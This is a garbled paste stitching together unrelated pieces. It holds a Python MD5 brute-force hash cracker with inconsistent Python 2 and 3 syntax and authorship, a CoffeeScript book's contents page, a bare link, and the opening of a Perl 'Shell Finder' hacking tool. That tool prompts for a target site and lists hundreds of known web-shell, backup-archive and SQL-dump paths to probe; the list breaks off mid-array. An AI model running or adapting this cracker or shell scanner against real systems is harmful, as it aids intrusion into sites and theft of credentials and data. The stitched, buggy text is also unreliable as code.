print '# Version 1.0.0'.ljust(55) + '#'
print '# Coded by InvisibleMan in Python 2.7.5'.ljust(55) + '#'
print '# Download : http://sourceforge.net/projects/md5crack/'.ljust(55) + '#'
print '#' + ''.center(54) + '#'
print ''.rjust(56, '#')
if sys.version_info.major != 2 or sys.version_info.minor != 7:
errorExit('Requires Python version 2.7')
if len(sys.argv) == 2:
if len(sys.argv[1]) == 32 and sys.argv[1].isalnum():
bruteForce(sys.argv[1])
else:
error('Invalid MD5 hash!')
errorExit('Usage : crack.py [HASH]')
else:
error('Missing command line arguments.')
errorExit('Usage : pycrack.py [HASH]')# PyCrack MD5 Hash Cracker
# Version 1.0.0
# Coded by BlackMan in Python 3.3.2
# Download : http://sourceforge.net/projects/md5crack/
# File : pycrack.py
#IMPORTS
import hashlib
import os
import sys
import datetime
#GLOBAL
startTime = datetime.datetime.now()
#DEBUG MESSAGES
def action(msg) : print('[#] - ' + msg)
def alert(msg) : print('[+] - ' + msg)
def error(msg) : print('[!] - ' + msg)
def errorExit(msg) : raise SystemExit('[!] - ' + msg)
#MD5 STRING
def md5(string): return hashlib.md5(string.encode('utf-8')).hexdigest()
#PERMUTATION BUILDER
def xpermutation(characters, size):
if size == 0:
yield []
else:
for x in range(len(characters)):
for y in xpermutation(characters[:x] + characters[x:], size - 1):
yield [characters[x]] + y
#BRUTE FORCE
def bruteForce(hash):
attempt = 0
characters = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
maxLength = range(0,25)
stringBuilder = ''
for length in maxLength:
for x in xpermutation(characters, length):
permutation = stringBuilder + ''.join(x)
attempt = attempt + 1
if md5(permutation) == hash:
end_time = str(datetime.datetime.now() - startTime).split('.')[0]
print('[' + str(attempt) + '] - ' + permutation + ' - CRACKED! Took ' + end_time)
input('\nPress the <ENTER> key to EXIT...')
sys.exit()
else:
print('[' + str(attempt) + '] - ' + permutation)
errorExit('Failed to brute force hash.')
#START
if os.name == 'nt' : os.system('cls')
else : os.system('clear')
print ''.rjust(56, '#')
print '#' + ''.center(54) + '#'
print '# PyCrack MD5 Hash Cracker'.ljust(55) + '#'
print '# Version 1.0.0'.ljust(55) + '#'
print '# Coded by InvisibleMan in Python 3.3.2'.ljust(55) + '#'
print '# Download : http://sourceforge.net/projects/md5crack/'.ljust(55) + '#'
print '#' + ''.center(54) + '#'
print ''.rjust(56, '#')
if sys.version_info.major != 3 or sys.version_info.minor != 3:
errorExit('Requires Python version 3.3')
if len(sys.argv) == 2:
if len(sys.argv[1]) == 32 and sys.argv[1].isalnum():
bruteForce(sys.argv[1])
else:
error('Invalid MD5 hash!')
errorExit('Usage : pycrack.py [HASH]')
else:
error('Missing command line arguments.')
errorExit('Usage : pycrack.py [HASH]')
Getting Started . . . . . . . . . . . . 1
1.1 Installing CoffeeScript 1
1.2 Text Editors for CoffeeScript 5
1.3 Meet 'coffee' 6
1.4 Debugging CoffeeScript 9
2. Functions, Scope, and Context . . . . . . . 13
2.1 Functions 101 13
2.2 Scope: Where You See 'Em 18
2.3 Context (or, "What Is 'this'?") 21
2.4 Property Arguments (@arg) 24
2.5 Default Arguments (arg =) 25
2.6 Splats (...) 28
2.7 Project: 5x5 Input Parser 29
2.9 Exercises 34
3. Collections and Iteration . . . . . . . . . 37
3.1 Objects as Hashes 37
3.2 Arrays 40
3.3 Iterating over Collections 43
3.4 Conditional Iteration 46
3.5 Comprehensions 47
3.6 Pattern Matching (or, Destructuring Assignment) 48
3.7 Project: 5x5 Solitaire 50
3.9 Exercises 56
4. Modules and Classes . . . . . . . . . . 59
4.1 Modules: Splitting Up Apps 60
4.2 The Power of Prototypes 61
4.3 Classes: Functions with Prototypes 63
4.4 Inheritance with 'extends' 65
4.5 Project: Refactoring 5x5 68
4.7 Exercises 72
5. Web Interactivity with jQuery . . . . . . . . 75
5.1 The Tao of jQuery 76
5.2 Manipulating the DOM 76
5.3 Getting Selective 77
5.4 Reacting to Events 79
5.5 Project: Browser-Based 5x5 80
5.7 Exercises 88
6. Server-Side Apps with Node.js . . . . . . . . 91
6.1 What Is Node.js? 91
6.2 Modularizing Code with 'exports' and 'require' 92
6.3 Thinking Asynchronously 93
6.4 Project: Multiplayer 5x5 97
6.6 Exercises 105
A1. Answers to Exercises . . . . . . . . . 107
A1.1 Functions, Scope, and Context 107
A1.2 Collections and Iteration 109
A1.3 Modules and Classes 111
A1.4 Web Interactivity with jQuery 112
A1.5 Server-Side Apps with Node.js 113
A2. Ways of Running CoffeeScript . . . . . . . 115
A2.1 Web Consoles 115
A2.2 Running CoffeeScript in Your Web App 116
A2.3 CoffeeScript on Rails 116
A2.4 CoffeeScript via Middleware 117
A2.5 CoffeeScript on Node.js 117
A2.6 Rapid Websites with Middleman 118
A2.7 CoffeeScript for System Scripts 119
A3. Cheat Sheet for JavaScripters . . . . . . . 121
A3.1 Boolean Operators 121
A3.2 The Existential Operator 121
A3.3 Context and Prototype Accessors 122
A3.4 Function Definitions 122
A3.5 Conditionals 122
A3.6 Property Existence 122
A3.7 Iteration 123https://jumpshare.com/v/K3JcN0eIWFUsswYUATZS
#!usr/bin/perl
use LWP::UserAgent;
use Term::ANSIColor;
use HTTP::Request;
inicio:
$sis="$^O";if ($sis eq linux){ $cmd="clear";} else { $cmd="cls"; }
system("$cmd");
system("Title Shell Finder v1.0");
print color("bold red"),"\t##################################################\n";
print "\t# #\n";
print "\t# /.Shell Finder v1.0 #\n";
print "\t# /.Coded By D3V1L \(ArdKing)\ #\n";
print "\t# /.Greetz to all albanian coders/hackers #\n";
print "\t# /.FB : fb.com/d3v1lal #\n";
print "\t# /.ICQ : 693904949 #\n";
print "\t# #\n";
print "\t##################################################\n";
print color 'reset';
sleep(1);
print color("bold red"),"\n\nURL \(ex. site.com/)\ : ";
print color 'reset';
print color("green"); $h0st = <STDIN>;
print color 'reset';
chomp($h0st);
if($host !~ /http:\/\//) {
$h0st = "http://$h0st";
}
print color("bold red"),"\n\n \[+]\ Starting scan\n\n";print color 'reset';
@shell = ("WSO.php","dz.php","DZ.php","cpanel.php","cpn.php","sos.php","term.php","Sec-War.php","sql.php","b374.php","ssl.php","mysql.php","WolF.php","madspot.php",
"Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","/libraries/imi.php","/libraries/wso.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
"vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
"d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","info.php","egyshell.php","Sym.php","c22.php","c100.php",
"wp-content/plugins/akismet/admin.php#","configuration.php","g.php","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
"wp-content/plugins/akismet/widget.php#","xx.pl","ls.php","Cpanel.php","k.php","/libraries/legacy/log/v_5.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
"tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
"tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","0day.php","tmp/admin.php","cliente/downloads/h4xor.php",
"whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
"templates/rhuk_milkyway/index.php","templates/beez/index.php","sado.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
"admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","sniper.php","administration/Sym.php","images/Sym.php",
"/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","gzaa_spysl","sql-new.php","/shell.php","/sa.php","/admin.php",
"/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
"/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
"/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
"/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","r00t-s3c.php","c.php","/backup.sql","/back.sql","/data.sql","wp.rar/",
"wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
"tmp/killer.php","whmcs.php","abuhlail.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
"tmp/d0maine.php","d0maine.php","tmp/sql.php","X.php","123.php","m.php","b.php","up.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
"forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
"spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
"Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
"tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
"/wp-content/plugins/count-per-day/js/yc/d00.php","bluff.php","king.jeen","admins/","admins.asp","admins.php","wp.zip","/wp-content/plugins/disqus-comment-system/WSO.php",
"/wp-content/plugins/disqus-comment-system/dz.php",
"/wp-content/plugins/disqus-comment-system/DZ.php",
"/wp-content/plugins/disqus-comment-system/cpanel.php",
"/wp-content/plugins/disqus-comment-system/cpn.php",
"/wp-content/plugins/disqus-comment-system/sos.php",
"/wp-content/plugins/disqus-comment-system/term.php",
"/wp-content/plugins/disqus-comment-system/Sec-War.php",
"/wp-content/plugins/disqus-comment-system/sql.php",
"/wp-content/plugins/disqus-comment-system/ssl.php",
"/wp-content/plugins/disqus-comment-system/mysql.php",
"/wp-content/plugins/disqus-comment-system/WolF.php",
"/wp-content/plugins/disqus-comment-system/madspot.php",
"/wp-content/plugins/disqus-comment-system/Cgishell.pl",
"/wp-content/plugins/disqus-comment-system/killer.php",
"/wp-content/plugins/disqus-comment-system/changeall.php",
"/wp-content/plugins/disqus-comment-system/2.php",
"/wp-content/plugins/disqus-comment-system/Sh3ll.php",
"/wp-content/plugins/disqus-comment-system/dz0.php",
"/wp-content/plugins/disqus-comment-system/dam.php",
"/wp-content/plugins/disqus-comment-system/user.php",
"/wp-content/plugins/disqus-comment-system/dom.php",
"/wp-content/plugins/disqus-comment-system/whmcs.php",
"/wp-content/plugins/disqus-comment-system/vb.zip",
"/wp-content/plugins/disqus-comment-system/r00t.php",
"/wp-content/plugins/disqus-comment-system/c99.php",
"/wp-content/plugins/disqus-comment-system/gaza.php",
"/wp-content/plugins/disqus-comment-system/1.php",
"/wp-content/plugins/disqus-comment-system/d0mains.php",
"/wp-content/plugins/disqus-comment-system/madspotshell.php",
"/wp-content/plugins/disqus-comment-system/info.php",
"/wp-content/plugins/disqus-comment-system/egyshell.php",
"/wp-content/plugins/disqus-comment-system/Sym.php",
"/wp-content/plugins/disqus-comment-system/c22.php",
"/wp-content/plugins/disqus-comment-system/c100.php",
"/wp-content/plugins/disqus-comment-system/configuration.php",
"/wp-content/plugins/disqus-comment-system/g.php",
"/wp-content/plugins/disqus-comment-system/xx.pl",
"/wp-content/plugins/disqus-comment-system/ls.php",
"/wp-content/plugins/disqus-comment-system/Cpanel.php",
"/wp-content/plugins/disqus-comment-system/k.php",
"/wp-content/plugins/disqus-comment-system/zone-h.php",
"/wp-content/plugins/disqus-comment-system/tmp/user.php",
"/wp-content/plugins/disqus-comment-system/tmp/Sym.php",
"/wp-content/plugins/disqus-comment-system/cp.php",
"/wp-content/plugins/disqus-comment-system/tmp/madspotshell.php",
"/wp-content/plugins/disqus-comment-system/tmp/root.php",
"/wp-content/plugins/disqus-comment-system/tmp/whmcs.php",
"/wp-content/plugins/disqus-comment-system/tmp/index.php",
"/wp-content/plugins/disqus-comment-system/tmp/2.php",
"/wp-content/plugins/disqus-comment-system/tmp/dz.php",
"/wp-content/plugins/disqus-comment-system/tmp/cpn.php",
"/wp-content/plugins/disqus-comment-system/tmp/changeall.php",
"/wp-content/plugins/disqus-comment-system/tmp/Cgishell.pl",
"/wp-content/plugins/disqus-comment-system/tmp/sql.php",
"/wp-content/plugins/disqus-comment-system/0day.php",
"/wp-content/plugins/disqus-comment-system/tmp/admin.php",
"/wp-content/plugins/disqus-comment-system/L3b.php",
"/wp-content/plugins/disqus-comment-system/d.php",
"/wp-content/plugins/disqus-comment-system/tmp/d.php",
"/wp-content/plugins/disqus-comment-system/tmp/L3b.php",
"/wp-content/plugins/disqus-comment-system/sado.php",
"/wp-content/plugins/disqus-comment-system/admin1.php",
"/wp-content/plugins/disqus-comment-system/upload.php",
"/wp-content/plugins/disqus-comment-system/up.php",
"/wp-content/plugins/disqus-comment-system/vb.zip",
"/wp-content/plugins/disqus-comment-system/vb.rar",
"/wp-content/plugins/disqus-comment-system/admin2.asp",
"/wp-content/plugins/disqus-comment-system/uploads.php",
"/wp-content/plugins/disqus-comment-system/sa.php",
"/wp-content/plugins/disqus-comment-system/sysadmins/",
"/wp-content/plugins/disqus-comment-system/admin1/",
"/wp-content/plugins/disqus-comment-system/sniper.php",
"/wp-content/plugins/disqus-comment-system/images/Sym.php",
"/wp-content/plugins/disqus-comment-system//r57.php",
"/wp-content/plugins/disqus-comment-system/gzaa_spysl",
"/wp-content/plugins/disqus-comment-system/sql-new.php",
"/wp-content/plugins/disqus-comment-system//shell.php",
"/wp-content/plugins/disqus-comment-system//sa.php",
"/wp-content/plugins/disqus-comment-system//admin.php",
"/wp-content/plugins/disqus-comment-system//sa2.php",
"/wp-content/plugins/disqus-comment-system//2.php",
"/wp-content/plugins/disqus-comment-system//gaza.php",
"/wp-content/plugins/disqus-comment-system//up.php",
"/wp-content/plugins/disqus-comment-system//upload.php",
"/wp-content/plugins/disqus-comment-system//uploads.php",
"/wp-content/plugins/disqus-comment-system/shell.php",
"/wp-content/plugins/disqus-comment-system//amad.php",
"/wp-content/plugins/disqus-comment-system//t00.php",
"pwp-content/plugins/disqus-comment-system/disqus.php",
"wp-content/plugins/akismet/WSO.php",
"wp-content/plugins/akismet/dz.php",
"wp-content/plugins/akismet/DZ.php",
"wp-content/plugins/akismet/cpanel.php",
"wp-content/plugins/akismet/cpn.php",
"wp-content/plugins/akismet/sos.php",
"wp-content/plugins/akismet/term.php",
"wp-content/plugins/akismet/Sec-War.php",
"wp-content/plugins/akismet/sql.php",
"wp-content/plugins/akismet/ssl.php",
"wp-content/plugins/akismet/mysql.php",
"wp-content/plugins/akismet/WolF.php",
"wp-content/plugins/akismet/madspot.php",
"wp-content/plugins/akismet/Cgishell.pl",
"wp-content/plugins/akismet/killer.php",
"wp-content/plugins/akismet/changeall.php",
"wp-content/plugins/akismet/2.php",
"wp-content/plugins/akismet/Sh3ll.php",
"wp-content/plugins/akismet/dz0.php",
"wp-content/plugins/akismet/dam.php",
"wp-content/plugins/akismet/user.php",
"wp-content/plugins/akismet/dom.php",
"wp-content/plugins/akismet/whmcs.php",
"wp-content/plugins/akismet/vb.zip",
"wp-content/plugins/akismet/r00t.php",
"wp-content/plugins/akismet/c99.php",
"wp-content/plugins/akismet/gaza.php",
"wp-content/plugins/akismet/1.php",
"wp-content/plugins/akismet/d0mains.php",
"wp-content/plugins/akismet/madspotshell.php",
"wp-content/plugins/akismet/info.php",
"wp-content/plugins/akismet/egyshell.php",
"wp-content/plugins/akismet/Sym.php",
"wp-content/plugins/akismet/c22.php",
"wp-content/plugins/akismet/c100.php",
"wp-content/plugins/akismet/configuration.php",
"wp-content/plugins/akismet/g.php",
"wp-content/plugins/akismet/xx.pl",
"wp-content/plugins/akismet/ls.php",
"wp-content/plugins/akismet/Cpanel.php",
"wp-content/plugins/akismet/k.php",
"wp-content/plugins/akismet/zone-h.php",
"wp-content/plugins/akismet/tmp/user.php",
"wp-content/plugins/akismet/tmp/Sym.php",
"wp-content/plugins/akismet/cp.php",
"wp-content/plugins/akismet/tmp/madspotshell.php",
"wp-content/plugins/akismet/tmp/root.php",
"wp-content/plugins/akismet/tmp/whmcs.php",
"wp-content/plugins/akismet/tmp/index.php",
"wp-content/plugins/akismet/tmp/2.php",
"wp-content/plugins/akismet/tmp/dz.php",
"wp-content/plugins/akismet/tmp/cpn.php",
"wp-content/plugins/akismet/tmp/changeall.php",
"wp-content/plugins/akismet/tmp/Cgishell.pl",
"wp-content/plugins/akismet/tmp/sql.php",
"wp-content/plugins/akismet/0day.php",
"wp-content/plugins/akismet/tmp/admin.php",
"wp-content/plugins/akismet/L3b.php",
"wp-content/plugins/akismet/d.php",
"wp-content/plugins/akismet/tmp/d.php",
"wp-content/plugins/akismet/tmp/L3b.php",
"wp-content/plugins/akismet/sado.php",
"wp-content/plugins/akismet/admin1.php",
"wp-content/plugins/akismet/upload.php",
"wp-content/plugins/akismet/up.php",
"wp-content/plugins/akismet/vb.zip",
"wp-content/plugins/akismet/vb.rar",
"wp-content/plugins/akismet/admin2.asp",
"wp-content/plugins/akismet/uploads.php",
"wp-content/plugins/akismet/sa.php",
"wp-content/plugins/akismet/sysadmins/",
"wp-content/plugins/akismet/admin1/",
"wp-content/plugins/akismet/sniper.php",
"wp-content/plugins/akismet/images/Sym.php",
"wp-content/plugins/akismet//r57.php",
"wp-content/plugins/akismet/gzaa_spysl",
"wp-content/plugins/akismet/sql-new.php",
"wp-content/plugins/akismet//shell.php",
"wp-content/plugins/akismet//sa.php",
"wp-content/plugins/akismet//admin.php",
"wp-content/plugins/akismet//sa2.php",
"wp-content/plugins/akismet//2.php",
"wp-content/plugins/akismet//gaza.php",
"wp-content/plugins/akismet//up.php",
"wp-content/plugins/akismet//upload.php",
"wp-content/plugins/akismet//uploads.php",
"wp-content/plugins/akismet/shell.php",
"wp-content/plugins/akismet//amad.php",
"wp-content/plugins/akismet//t00.php",
"wp-content/plugins/akismet//dz.php",
"wp-content/plugins/akismet//site.rar",
"wp-content/plugins/akismet//Black.php",
"wp-content/plugins/akismet//site.tar.gz",
"wp-content/plugins/akismet//home.zip",
"wp-content/plugins/akismet//home.rar",
"wp-content/plugins/akismet//home.tar",
"wp-content/plugins/akismet//home.tar.gz",
"wp-content/plugins/akismet//forum.zip",
"wp-content/plugins/akismet//forum.rar",
"wp-content/plugins/akismet//forum.tar",
"wp-content/plugins/akismet//forum.tar.gz",
"wp-content/plugins/akismet//test.txt",
"wp-content/plugins/akismet//ftp.txt",
"wp-content/plugins/akismet//user.txt",
"wp-content/plugins/akismet//site.txt",
"wp-content/plugins/akismet//error_log",
"wp-content/plugins/akismet//error",
"wp-content/plugins/akismet//cpanel",
"wp-content/plugins/akismet//awstats",
"wp-content/plugins/akismet//site.sql",
"wp-content/plugins/akismet//vb.sql",
"wp-content/plugins/akismet//forum.sql",
"wp-content/plugins/akismet/r00t-s3c.php",
"wp-content/plugins/akismet/c.php",
"wp-content/plugins/akismet//backup.sql",
"wp-content/plugins/akismet//back.sql",
"wp-content/plugins/akismet//data.sql",
"wp-content/plugins/akismet/wp.rar/",
"wp-content/plugins/akismet/asp.aspx",
"wp-content/plugins/akismet/tmp/vaga.php",
"wp-content/plugins/akismet/tmp/killer.php",
"wp-content/plugins/akismet/whmcs.php",
"wp-content/plugins/akismet/abuhlail.php",
"wp-content/plugins/akismet/tmp/killer.php",
"wp-content/plugins/akismet/tmp/domaine.pl",
"wp-content/plugins/akismet/tmp/domaine.php",
"wp-content/plugins/akismet/useradmin/",
"wp-content/plugins/akismet/tmp/d0maine.php",
"wp-content/plugins/akismet/d0maine.php",
"wp-content/plugins/akismet/tmp/sql.php",
"wp-content/plugins/akismet/X.php",
"wp-content/plugins/akismet/123.php",
"wp-content/plugins/akismet/m.php",
"wp-content/plugins/akismet/b.php",
"wp-content/plugins/akismet/up.php",
"wp-content/plugins/akismet/tmp/dz1.php",
"wp-content/plugins/akismet/dz1.php",
"wp-content/plugins/akismet/forum.zip",
"wp-content/plugins/akismet/Symlink.php",
"wp-content/plugins/akismet/Symlink.pl",
"wp-content/plugins/akismet/forum.rar",
"wp-content/plugins/akismet/joomla.zip",
"wp-content/plugins/akismet/joomla.rar",
"wp-content/plugins/akismet/wp.php",
"wp-content/plugins/akismet/buck.sql",
"wp-content/plugins/akismet/sysadmin.php",
"wp-content/plugins/akismet/images/c99.php",
"wp-content/plugins/akismet/xd.php",
"wp-content/plugins/akismet/c100.php",
"wp-content/plugins/akismet/spy.aspx",
"wp-content/plugins/akismet/xd.php",
"wp-content/plugins/akismet/tmp/xd.php",
"wp-content/plugins/akismet/sym/root/home/",
"wp-content/plugins/akismet/billing/killer.php",
"wp-content/plugins/akismet/tmp/upload.php",
"wp-content/plugins/akismet/tmp/admin.php",
"wp-content/plugins/akismet/Server.php",
"wp-content/plugins/akismet/tmp/uploads.php",
"wp-content/plugins/akismet/tmp/up.php",
"wp-content/plugins/akismet/Server/",
"wp-content/plugins/akismet/wp-admin/c99.php",
"wp-content/plugins/akismet/tmp/priv8.php",
"wp-content/plugins/akismet/priv8.php",
"wp-content/plugins/akismet/cgi.pl/",
"wp-content/plugins/akismet/tmp/cgi.pl",
"wp-content/plugins/akismet/downloads/dom.php",
"wp-content/plugins/akismet/webadmin.html",
"wp-content/plugins/akismet/admins.php",
"wp-content/plugins/akismet/bluff.php",
"wp-content/plugins/akismet/king.jeen",
"wp-content/plugins/akismet/admins/",
"wp-content/plugins/akismet/admins.asp",
"wp-content/plugins/akismet/admins.php",
"wp-content/plugins/akismet/wp.zip",
"wp-content/plugins/akismet/disqus.php",
"wp-content/plugins/google-sitemap-generator//cpanel",
"wp-content/plugins/google-sitemap-generator//awstats",
"wp-content/plugins/google-sitemap-generator//site.sql",
"wp-content/plugins/google-sitemap-generator//vb.sql",
"wp-content/plugins/google-sitemap-generator//forum.sql",
"wp-content/plugins/google-sitemap-generator/r00t-s3c.php",
"wp-content/plugins/google-sitemap-generator/c.php",
"wp-content/plugins/google-sitemap-generator//backup.sql",
"wp-content/plugins/google-sitemap-generator//back.sql",
"wp-content/plugins/google-sitemap-generator//data.sql",
"wp-content/plugins/google-sitemap-generator/wp.rar/",
"wp-content/plugins/google-sitemap-generator/asp.aspx",
"wp-content/plugins/google-sitemap-generator/tmp/vaga.php",
"wp-content/plugins/google-sitemap-generator/tmp/killer.php",
"wp-content/plugins/google-sitemap-generator/whmcs.php",
"wp-content/plugins/google-sitemap-generator/abuhlail.php",
"wp-content/plugins/google-sitemap-generator/tmp/killer.php",
"wp-content/plugins/google-sitemap-generator/tmp/domaine.pl",
"wp-content/plugins/google-sitemap-generator/tmp/domaine.php",
"wp-content/plugins/google-sitemap-generator/useradmin/",
"wp-content/plugins/google-sitemap-generator/tmp/d0maine.php",
"wp-content/plugins/google-sitemap-generator/d0maine.php",
"wp-content/plugins/google-sitemap-generator/tmp/sql.php",
"wp-content/plugins/google-sitemap-generator/X.php",
"wp-content/plugins/google-sitemap-generator/123.php",
"wp-content/plugins/google-sitemap-generator/m.php",
"wp-content/plugins/google-sitemap-generator/b.php",
"wp-content/plugins/google-sitemap-generator/up.php",
"wp-content/plugins/google-sitemap-generator/tmp/dz1.php",
"wp-content/plugins/google-sitemap-generator/dz1.php",
"wp-content/plugins/google-sitemap-generator/forum.zip",
"wp-content/plugins/google-sitemap-generator/Symlink.php",
"wp-content/plugins/google-sitemap-generator/Symlink.pl",
"wp-content/plugins/google-sitemap-generator/forum.rar",
"wp-content/plugins/google-sitemap-generator/joomla.zip",
"wp-content/plugins/google-sitemap-generator/joomla.rar",
"wp-content/plugins/google-sitemap-generator/wp.php",
"wp-content/plugins/google-sitemap-generator/buck.sql",
"wp-content/plugins/google-sitemap-generator/sysadmin.php",
"wp-content/plugins/google-sitemap-generator/images/c99.php",
"wp-content/plugins/google-sitemap-generator/xd.php",
"wp-content/plugins/google-sitemap-generator/c100.php",
"wp-content/plugins/google-sitemap-generator/spy.aspx",
"wp-content/plugins/google-sitemap-generator/xd.php",
"wp-content/plugins/google-sitemap-generator/tmp/xd.php",
"wp-content/plugins/google-sitemap-generator/sym/root/home/",
"wp-content/plugins/google-sitemap-generator/billing/killer.php",
"wp-content/plugins/google-sitemap-generator/tmp/upload.php",
"wp-content/plugins/google-sitemap-generator/tmp/admin.php",
"wp-content/plugins/google-sitemap-generator/Server.php",
"wp-content/plugins/google-sitemap-generator/tmp/uploads.php",
"wp-content/plugins/google-sitemap-generator/tmp/up.php",
"wp-content/plugins/google-sitemap-generator/Server/",
"wp-content/plugins/google-sitemap-generator/wp-admin/c99.php",
"wp-content/plugins/google-sitemap-generator/tmp/priv8.php",
"wp-content/plugins/google-sitemap-generator/priv8.php",
"wp-content/plugins/google-sitemap-generator/cgi.pl/",
"wp-content/plugins/google-sitemap-generator/tmp/cgi.pl",
"wp-content/plugins/google-sitemap-generator/downloads/dom.php",
"wp-content/plugins/google-sitemap-generator/webadmin.html",
"wp-content/plugins/google-sitemap-generator/admins.php",
"wp-content/plugins/google-sitemap-generator/bluff.php",
"wp-content/plugins/google-sitemap-generator/king.jeen",
"wp-content/plugins/google-sitemap-generator/admins/",
"wp-content/plugins/google-sitemap-generator/admins.asp",
"wp-content/plugins/google-sitemap-generator/admins.php",
"wp-content/plugins/google-sitemap-generator/wp.zip",
"wp-content/plugins/google-sitemap-generator/sitemap-core.php",
"/templates/beez/WSO.php",
"/templates/beez/dz.php",
"/templates/beez/DZ.php",
"/templates/beez/cpanel.php",
"/templates/beez/cpn.php",
"/templates/beez/sos.php",
"/templates/beez/term.php",
"/templates/beez/Sec-War.php",
"/templates/beez/sql.php",
"/templates/beez/ssl.php",
"/templates/beez/mysql.php",
"/templates/beez/WolF.php",
"/templates/beez/madspot.php",
"/templates/beez/Cgishell.pl",
"/templates/beez/killer.php",
"/templates/beez/changeall.php",
"/templates/beez/2.php",
"/templates/beez/Sh3ll.php",
"/templates/beez/dz0.php",
"/templates/beez/dam.php",
"/templates/beez/user.php",
"/templates/beez/dom.php",
"/templates/beez/whmcs.php",
"/templates/beez/vb.zip",
"/templates/beez/r00t.php",
"/templates/beez/c99.php",
"/templates/beez/gaza.php",
"/templates/beez/1.php",
"/templates/beez/d0mains.php",
"/templates/beez/madspotshell.php",
"/templates/beez/info.php",
"/templates/beez/egyshell.php",
"/templates/beez/Sym.php",
"/templates/beez/c22.php",
"/templates/beez/c100.php",
"/templates/beez/configuration.php",
"/templates/beez/g.php",
"/templates/beez/xx.pl",
"/templates/beez/ls.php",
"/templates/beez/Cpanel.php",
"/templates/beez/k.php",
"/templates/beez/zone-h.php",
"/templates/beez/tmp/user.php",
"/templates/beez/tmp/Sym.php",
"/templates/beez/cp.php",
"/templates/beez/tmp/madspotshell.php",
"/templates/beez/tmp/root.php",
"/templates/beez/tmp/whmcs.php",
"/templates/beez/tmp/index.php",
"/templates/beez/tmp/2.php",
"/templates/beez/tmp/dz.php",
"/templates/beez/tmp/cpn.php",
"/templates/beez/tmp/changeall.php",
"/templates/beez/tmp/Cgishell.pl",
"/templates/beez/tmp/sql.php",
"/templates/beez/0day.php",
"/templates/beez/tmp/admin.php",
"/templates/beez/L3b.php",
"/templates/beez/d.php",
"/templates/beez/tmp/d.php",
"/templates/beez/tmp/L3b.php",
"/templates/beez/sado.php",
"/templates/beez/admin1.php",
"/templates/beez/upload.php",
"/templates/beez/up.php",
"/templates/beez/vb.zip",
"/templates/beez/vb.rar",
"/templates/beez/admin2.asp",
"/templates/beez/uploads.php",
"/templates/beez/sa.php",
"/templates/beez/sysadmins/",
"/templates/beez/admin1/",
"/templates/beez/sniper.php",
"/templates/beez/images/Sym.php",
"/templates/beez//r57.php",
"/templates/beez/gzaa_spysl",
"/templates/beez/sql-new.php",
"/templates/beez//shell.php",
"/templates/beez//sa.php",
"/templates/beez//admin.php",
"/templates/beez//sa2.php",
"/templates/beez//2.php",
"/templates/beez//gaza.php",
"/templates/beez//up.php",
"/templates/beez//upload.php",
"/templates/beez//uploads.php",
"/templates/beez/shell.php",
"/templates/beez//amad.php",
"/templates/beez//t00.php",
"/templates/beez//dz.php",
"/templates/beez//site.rar",
"/templates/beez//Black.php",
"/templates/beez//site.tar.gz",
"/templates/beez//home.zip",
"/templates/beez//home.rar",
"/templates/beez//home.tar",
"/templates/beez//home.tar.gz",
"/templates/beez//forum.zip",
"/templates/beez//forum.rar",
"/templates/beez//forum.tar",
"/templates/beez//forum.tar.gz",
"/templates/beez//test.txt",
"/templates/beez//ftp.txt",
"/templates/beez//user.txt",
"/templates/beez//site.txt",
"/templates/beez//error_log",
"/templates/beez//error",
"/templates/beez//cpanel",
"/templates/beez//awstats",
"/templates/beez//site.sql",
"/templates/beez//vb.sql",
"/templates/beez//forum.sql",
"/templates/beez/r00t-s3c.php",
"/templates/beez/c.php",
"/templates/beez//backup.sql",
"/templates/beez//back.sql",
"/templates/beez//data.sql",
"/templates/beez/wp.rar/",
"/templates/beez/asp.aspx",
"/templates/beez/tmp/vaga.php",
"/templates/beez/tmp/killer.php",
"/templates/beez/whmcs.php",
"/templates/beez/abuhlail.php",
"/templates/beez/tmp/killer.php",
"/templates/beez/tmp/domaine.pl",
"/templates/beez/tmp/domaine.php",
"/templates/beez/useradmin/",
"/templates/beez/tmp/d0maine.php",
"/templates/beez/d0maine.php",
"/templates/beez/tmp/sql.php",
"/templates/beez/X.php",
"/templates/beez/123.php",
"/templates/beez/m.php",
"/templates/beez/b.php",
"/templates/beez/up.php",
"/templates/beez/tmp/dz1.php",
"/templates/beez/dz1.php",
"/templates/beez/forum.zip",
"/templates/beez/Symlink.php",
"/templates/beez/Symlink.pl",
"/templates/beez/forum.rar",
"/templates/beez/joomla.zip",
"/templates/beez/joomla.rar",
"/templates/beez/wp.php",
"/templates/beez/buck.sql",
"/templates/beez/sysadmin.php",
"/templates/beez/images/c99.php",
